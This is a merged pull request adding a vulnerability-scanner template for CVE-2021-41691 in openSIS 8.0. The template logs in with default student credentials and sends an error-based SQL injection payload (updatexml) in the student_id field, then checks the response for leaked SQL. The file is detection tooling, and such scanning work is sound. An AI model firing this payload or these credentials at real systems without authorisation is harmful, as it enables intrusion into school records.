Merge pull request #3946 from bartutku/CVE-2021-41691

CVE-2021-41691

cves/2021/CVE-2021-41691.yaml

@@ -0,0 +1,46 @@
+id: CVE-2021-41691
+
+info:
+  name: openSIS Student Information System 8.0 SQl Injection Vulnerability
+  author: Bartu Utku SARP
+  severity: high
+  reference:
+    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
+    - https://www.exploit-db.com/exploits/50637
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
+  tags: cve,cve2021,opensis,sqli,auth
+
+requests:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
+
+      - |
+        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+
+    attack: pitchfork
+    payloads:
+      username:
+        - student
+
+      password:
+        - student@123
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
+          - 'status_code_2 == 200'
+        condition: and